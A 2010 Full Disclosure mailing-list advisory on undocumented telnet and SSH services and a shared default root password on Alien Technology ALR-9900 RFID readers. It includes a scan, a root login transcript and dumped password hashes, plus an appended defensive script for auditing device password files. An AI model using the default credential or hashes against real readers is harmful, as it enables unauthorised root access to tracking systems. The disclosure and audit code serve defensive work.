Full Disclosure mailing list archives

AlienTechnology ALR-9900 default root password and backdoor


From: alien_technology () hush com
Date: Tue, 04 May 2010 15:59:34 -0700


Tested:
        www.alientechnology.com/readers/alr9900.php

Background:
        Alien Technology is a major RFID reader designer and manufacturer.
Alien's products are sold to many corporations and the military.
Alien's readers can be interfaced with in several ways including:
serial, IO Port and Ethernet port.  Alien has several daemons
running on their reader that are accessible through Ethernet and
completely undocumented.  We called Alien several times to ask them
about these undocumented services and were first deferred to
technical support and then had our numbers blocked.  We then
emailed them about the security ramifications of these daemons and
received no reply.

The Undocumented:
        port 2323 - telnetd
        port 23 - telnetd
        port 22 - sshd

The Flaws:
        default root password = 'alien'
        alien account has same password across all readers
        port 2323 - provides a backdoor onto the readers for anyone who
knows the alien (or root) account password
        port 23  - ""
        port 22 - ""

The P.O.C:
Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific Daylight Time

Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.000092s latency).
Not shown: 995 closed ports

PORT     STATE SERVICE
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
111/tcp  open  rpcbind
2323/tcp open  unknown

MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds


login as: root
Using keyboard-interactive authentication.
Password: <- root
Access denied
Using keyboard-interactive authentication.
Password: <- password
Access denied
Using keyboard-interactive authentication.
Password: <- alien

Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX
root@alien-XXXXXX alien# id
uid=0(root) gid=0(root) groups=0(root)

root@alien-XXXXXX alien# cat /etc/passwd
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
ntpd:x:102:102::/var/run/openntpd:/bin/false
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The Alien,18220,,:/home/alien:/bin/bash

root@alien-XXXXXX alien# cat /etc/shadow
ntpd:!:13602:0:99999:7:::
sshd:!:13602:0:99999:7:::
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::

Impact:
        Alien's readers are deployed in many secure facilities with
typically closed networks.  Although these networks are closed,
these undocumented services could allow employees to modify reader
settings and subvert checkout systems.  These checkout systems are
often used to track valuable items, making such vulnerabilities a
serious matter.  If these readers are deployed on an open or large
network they provide an easy way to tunnel into the network or
attack it from an unexpected location.  Lastly, if someone cracks
the alien account's password hash they get to use Alien's backdoor.

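The two credential weaknesses the post documents (one account password shared by every shipped reader, and a root hash sitting in world-readable /etc/passwd rather than /etc/shadow) are exactly what a fleet audit of collected passwd/shadow dumps should catch. The script below is an added example, not code from the post or from Alien Technology; its device names and hashes are constructed placeholders, not the values published above.

```python
"""Audit passwd/shadow dumps pulled from several embedded devices for a hash that
is identical across devices (a shared vendor default) and for hashes kept in
world-readable /etc/passwd.  Added example; all sample data below is constructed."""
from collections import defaultdict

def parse_entries(text):
    """Map account name -> password field for passwd- or shadow-format text."""
    entries = {}
    for line in text.splitlines():
        if ":" not in line or line.startswith("#"):
            continue
        name, field = line.split(":", 2)[:2]
        entries[name] = field
    return entries

def is_real_hash(field):
    # '', 'x' (deferred to shadow), '*' and '!...' (locked) carry no usable hash
    return field not in ("", "x", "*") and not field.startswith("!")

def audit(devices):
    """devices: {name: {"passwd": text, "shadow": text}} -> [(severity, subject, message)]."""
    findings = []
    owners = defaultdict(set)  # (account, hash) -> devices carrying that exact hash
    for dev, files in devices.items():
        for acct, field in parse_entries(files["passwd"]).items():
            if is_real_hash(field):  # readable by every local user, not just root
                findings.append(("HIGH", dev, f"{acct}: hash stored in world-readable /etc/passwd"))
                owners[(acct, field)].add(dev)
        for acct, field in parse_entries(files.get("shadow", "")).items():
            if is_real_hash(field):
                owners[(acct, field)].add(dev)
    for (acct, _), devs in owners.items():
        if len(devs) > 1:  # same salt and digest on several devices means the same password
            findings.append(("HIGH", acct, f"identical hash on {len(devs)} devices: {', '.join(sorted(devs))}"))
    return findings

# Constructed sample: two readers still carry a shared default, the third was re-keyed.
SAMPLE_DEVICES = {
    "reader-a": {"passwd": "root:$1$SALTAAAA$PLACEHOLDERROOTHASH000:0:0:root:/root:/bin/bash\n"
                           "alien:x:1000:1000:The Alien:/home/alien:/bin/bash\n",
                 "shadow": "alien:$1$SALTBBBB$PLACEHOLDERALIENHASH00:13602:0:99999:7:::\n"},
    "reader-b": {"passwd": "root:$1$SALTAAAA$PLACEHOLDERROOTHASH000:0:0:root:/root:/bin/bash\n",
                 "shadow": "alien:$1$SALTBBBB$PLACEHOLDERALIENHASH00:13602:0:99999:7:::\n"},
    "reader-c": {"passwd": "root:x:0:0:root:/root:/bin/bash\n"
                           "alien:x:1000:1000:The Alien:/home/alien:/bin/bash\n",
                 "shadow": "root:$1$SALTCCCC$PLACEHOLDERUNIQUEHASH0:14000:0:99999:7:::\n"
                           "alien:!:14000:0:99999:7:::\n"},
}
if __name__ == "__main__":
    for severity, subject, message in audit(SAMPLE_DEVICES):
        print(severity, subject, message)
```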
